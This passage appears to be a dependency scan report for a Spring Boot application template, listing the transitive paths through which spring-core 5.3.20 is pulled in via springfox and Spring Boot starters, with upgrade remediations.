  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot-actuator@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
